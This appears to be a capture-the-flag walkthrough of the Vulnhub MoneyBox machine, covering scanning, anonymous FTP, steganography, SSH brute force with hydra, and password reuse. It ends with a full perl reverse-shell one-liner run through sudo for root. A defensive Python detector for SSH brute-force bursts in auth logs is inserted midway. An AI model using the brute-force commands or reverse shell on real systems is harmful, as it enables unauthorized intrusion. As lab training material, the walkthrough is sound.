Vulnhub MoneyBox

[MONEYBOX]

Difficulty: [Medium→Easy]
Score: 5.5/10


Target

  1. 3 flags
  2. Root privilege

Process

1. Local Network Discovering

Subnet discover

sudo arp-scan -I eth0 -l

Port Scan

sudo nmap -p- 192.168.1.105

Port 21, 22, 5000 open

Identify Port Service

sudo nmap -p21,22,5000 -sV 192.168.1.105

Nmap default script scan

sudo nmap -p21,22,80 -sC 192.168.1.105

We found that we can log in to the FTP service as Anonymous.

Log in to the FTP service and download the image.

2. Web Application Exploit

Web-path brute force enumeration

sudo dirsearch -u http://192.168.1.105


Check it out. There's no useful information.

Ctrl+U to view the page source.

We found the special directory.
Inspect the elements under S3cr3t-T3xt.

3. Steganography

The image must be useful; we need to find out what information is hidden in it.

Extract the information from the picture

strings trytofind.jpg

steghide info trytofind.jpg
steghide extract -sf trytofind.jpg

Enter the password we found: 3xtr4ctd4t4

cat the data.txt

4. Brute Force SSH

Prepare the dictionary

echo renu > user.txt
cp /usr/share/wordlists/rockyou.txt.gz .
gunzip rockyou.txt.gz

What tools are most effective?
Here are the two tools I used:

Nmap

sudo nmap --script ssh-brute --script-args userdb=user.txt,passdb=rockyou.txt 192.168.1.105

Hydra

hydra -l renu -P rockyou.txt 192.168.1.105 ssh

We got renu's password: 987654321
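As an added defender-side example (not part of the original walkthrough), a small Python detector that flags the burst of failed logins a hydra or nmap ssh-brute run leaves in sshd's auth log, and records whether a successful login followed. The host name, timestamps and IP addresses in the sample lines are constructed, and the syslog year is assumed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd lines from a host named "moneybox" (hypothetical name).
# Syslog timestamps carry no year, so the parser assumes one (2024 here).
SAMPLE_AUTH_LOG = """\
Dec 24 10:15:01 moneybox sshd[1201]: Failed password for renu from 192.168.1.100 port 51001 ssh2
Dec 24 10:15:01 moneybox sshd[1202]: Failed password for renu from 192.168.1.100 port 51002 ssh2
Dec 24 10:15:02 moneybox sshd[1203]: Failed password for renu from 192.168.1.100 port 51003 ssh2
Dec 24 10:15:02 moneybox sshd[1204]: Failed password for renu from 192.168.1.100 port 51004 ssh2
Dec 24 10:15:03 moneybox sshd[1205]: Failed password for renu from 192.168.1.100 port 51005 ssh2
Dec 24 10:15:04 moneybox sshd[1206]: Accepted password for renu from 192.168.1.100 port 51006 ssh2
Dec 24 10:20:00 moneybox sshd[1300]: Failed password for lily from 192.168.1.50 port 40001 ssh2
Dec 24 11:00:00 moneybox sshd[1301]: Accepted publickey for lily from 192.168.1.50 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+(?:\.\d+){3}) port \d+"
)

def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip) for an sshd auth line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Map each source IP with >= threshold failures inside window_s seconds to
    its failure count, the users it tried, and the first login accepted afterwards."""
    by_ip = defaultdict(list)
    for ev in map(parse_line, log_text.splitlines()):
        if ev:
            by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, events in by_ip.items():
        events.sort()
        fails = [e for e in events if e[1] == "Failed"]
        for i in range(len(fails) - threshold + 1):
            burst = fails[i:i + threshold]
            if (burst[-1][0] - burst[0][0]).total_seconds() > window_s:
                continue  # too slow to count as a burst; slide the window
            ok = [e for e in events if e[1] == "Accepted" and e[0] >= burst[-1][0]]
            alerts[ip] = {"failures": len(fails), "users": sorted({e[2] for e in fails}),
                          "success_after": ok[0][2] if ok else None}
            break
    return alerts
```

A "success_after" entry that is not None is the case worth paging on: the burst did not just fail, it ended in a valid session for the guessed account.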

5. Command and Control

Log in as user renu over SSH.

Get the first flag in renu's home directory.

Renu User History Collection

history

Oh damn! We found that renu copied lily's SSH private key.
That means renu's password is the same as lily's.

2 ways to get the lily flag

  1. Switch user
    The same password works, so switch with su or log in over SSH:
su - lily
  2. Cat the lily flag directly
    Maybe the same password means the same local group? Just try it:
cat /home/lily/user2.txt

Oh, that works!

Lily User information Collection

sudo -l


Oh how lucky we are! We can use perl to spawn a root privilege reverse shell.
Set the local machine listening on port 5555:

nc -lnvp 5555

Make the perl reverse shell

sudo perl -e 'use Socket;$i="{local machineIP}";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Cat the root flag

Summary


The hard and important part is finding the door to get a shell. Steganography is the newest part I have ever encountered; I think the virtual machine is CTF style. The privilege escalation is easy. If the privilege escalation were more difficult, the total difficulty would be raised to a higher level, maybe Medium→High or just Medium. It's my first time using a perl reverse shell. Here the ‘E’ parameter contains the shellcode.